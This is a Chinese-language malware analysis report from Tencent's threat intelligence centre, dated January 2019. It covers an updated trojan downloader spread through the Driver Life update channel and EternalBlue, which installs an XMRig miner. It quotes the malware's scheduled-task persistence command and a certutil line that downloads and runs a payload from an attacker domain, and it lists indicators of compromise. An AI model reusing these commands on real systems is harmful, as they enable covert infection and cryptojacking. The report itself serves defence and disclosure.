驱动人生永恒之蓝下载器木马的最新变化

2019-01-25 来源:原创 作者:腾讯电脑管家
【文章摘要】御见威胁情报中心再次监测到该木马下载器又有新动向,根据监测数据,木马会在已经感染的主机上,通过后门下载更新文件,同时在利用永恒之蓝漏洞攻击后感染的机器上,植入最新版本的木马。

一、背景

腾讯御见威胁情报中心于2018年12月14日首次发布了利用驱动人生系列软件的升级通道进行下发,并利用永恒之蓝漏洞扩散传播的挖矿木马预警(参考链接:https://mp.weixin.qq.com/s/xBx5tOl9LJmWurqgD8KYhQ),并于2018年12月15日凌晨发布完整技术报告(参考链接:https://mp.weixin.qq.com/s/XmEalNxxQ3kAySDvIVTDOw),2018年12月17日发布了针对驱动人生公司的定向攻击活动分析报告https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA。


在此次攻击事件发生之后,攻击者通过云控指令对下载木马进行了多次更新,御见威胁情报中心对此也进行了持续跟踪,在2018年12月19日通过微博公布了该团伙的后续更新动作:(参考链接:https://media.weibo.cn/article?id=2309404319028930855515),本次更新指令添加了计划任务安装Powershell后门。


2019年1月24日,御见威胁情报中心再次监测到该木马下载器又有新动向,根据监测数据,木马会在已经感染的主机上,通过后门下载更新文件,同时在利用永恒之蓝漏洞攻击后感染的机器上,植入最新版本的木马,更新文件相关信息如下:


更新文件下载URL:hxxp://dl.haqo.net/dll.exe

更新文件本地保存路径:C:\Windows\temp\updater.exe

MD5:59b18d6146a2aa066f661599c496090d


更新文件updater.exe执行后创建计划任务Ddrivers和启动项Ddriver来启动挖矿模块C:\Windows\SysWOW64\drivers\svchost.exe,与taskmgr.exe(伪装)共享进程内存执行挖代码。创建计划任务WebServers和启动项WebServers来安装用于下载木马的后门模块C:\Windows\SysWOW64\wmiex.exe。木马同时释放永恒之蓝攻击模块C:\windows\Temp\svchost.exe进行扩散攻击。

二、上传信息及木马下载

搜集以下信息上传至hxxp://i.haqo.net/i.png

ID:计算机名

GUID:机器标识符

MAC:物理地址

USER:当前用户

VER:系统版本

OS:操作系统

BIT:系统平台

CPU:CPU型号及性能

CARD:显卡信息

AV:杀毒软件安装信息


服务器接收请求并返回代码。



上传IDGUIDhxxp://dl.haqo.net/i_1.exez,并从服务器下载i_1.exez


下载hxxp://ii.haqo.net/u.png失败


域名解析请求失败

pp.abbny.com

oo.beahh.com



下载加密的xmrig挖矿文件hxxp://dl.haqo.net/xmrig-64_1.mlz


三、挖矿以及永恒之蓝攻击

updater.exe拷贝自身到C:\Windows\SysWOW64\drivers\svchost.exe并启动,同时拉起伪装成任务管理器的进程taskmgr.exe,利用该进程的共享内存进行挖矿。


将挖矿进程母体创建为计划任务Ddrivers,每隔50分钟运行一次



updater.exe释放wmiex.exe,创建计划任务WebServers,每隔50分钟执行一次C:\Windows\SysWOW64\wmiex.exe


wmiex.exe创建服务WebServers


通过WMI命令获取UUID、网卡信息等信息并上传


创建线程下载文件,解密后保存文件到C:\windows\Temp\目录并执行


通过cmd启动计划任务

cmd /c start /b sc start Schedule&ping localhost&sc query Schedule|findstr RUNNING&&(schtasks /delete /TN %s /f&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN %s /tr "cmd.exe /c %s"&schtasks /run /TN %s)


内存执行XMRig矿机(门罗币挖矿程序)连接矿池153.92.4.49进行挖矿


updater.exe将永恒之蓝攻击模块释放到C:\windows\Temp\svchost.exe


svchost.exe是将Python代码打包为exe执行的永恒之蓝攻击组件


漏洞攻击成功后执行以下命令进行感染:

certutil  -urlcache -split -f hxxp://dl.haqo.net/dll.exe c:/installs.exe

四、安全建议

1.服务器暂时关闭不必要的端口(如135139445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html

2.服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;

3.使用杀毒软件拦截可能的病毒攻击;

4.推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统



IOCs:

Md5

C:\Windows\temp\updater.exe

59b18d6146a2aa066f661599c496090d

30429a24f312153c0ec271ca3feabf3d


C:\Windows\Temp\dlupdate.exe

f9144118127ff29d4a49a30b242ceb55

fb89d40e24f5ff55228c38b2b07b2e77

1e0db9fdbc57525a2a5f5b4c69fac3bb


C:\Windows\SysWOW64\drivers\taskmgr.exe

5ab6f8ca1f22d88b8ef9a4e39fca0c03

d4e2ebcf92cf1b2e759ff7ce1f5688ca


C:\Windows\Temp\svchost.exe

32653b2c277f18779c568a1e45cacc0f

ab1c947c0c707c0e0486d25d0ae58148


C:\Windows\SysWOW64\wmiex.exe

a4b7940b3d6b03269194f728610784d6

85013cc5d7a6db3bcee3f6b787baf957

667a3848b411af0b6c944d47b559150f


domain

i.haqo.net

ii.haqo.net

dl.haqo.net

loop.haqo.net

loop2.haqo.net

loop.abbbny.com(无法解析)

oo.beahh.com(无法解析)

pp.abbny.com

o.beahh.com

p.abbny.com


IP

139.163.55.76

172.104.73.9


URL

hxxp://dl.haqo.net/dll.exe

hxxp://172.104.73.9/dll.exe

hxxp://dl.haqo.net/updatedl.exe

hxxp://i.haqo.net/i.png

hxxp://ii.haqo.net/u.png(无法下载)

hxxp://oo.beahh.com/u.png(无法下载)

hxxp://pp.abbny.com/u.png(无法下载)

hxxp://p.abbny.com/im.png(无法下载)

hxxp://dl.haqo.net/i_1.exez

hxxp://dl.haqo.net/xmrig-64_1.mlz(64位矿机)

hxxp://dl.haqo.net/xmrig-32_1.mlz(32位矿机)


矿池

153.92.4.49


参考链接:


永恒之蓝漏洞扩散传播的挖矿木马预警

https://mp.weixin.qq.com/s/xBx5tOl9LJmWurqgD8KYhQ


“驱动人生”升级通道传木马完整技术分析报告

https://mp.weixin.qq.com/s/XmEalNxxQ3kAySDvIVTDOw


针对驱动人生公司的定向攻击活动分析报告

https://mp.weixin.qq.com/s/ctBgivcvH216dwq00WRmOA


12月19日,利用驱动人生升级通道传播的木马下载器出现新变化

https://media.weibo.cn/article?id=2309404319028930855515


如何关闭不必要的端口(如135、139、445)

https://guanjia.qq.com/web_clinic/s8/585.html

电脑管家V13

权限雷达全新升级

详情>>

版本更新:2018.11.12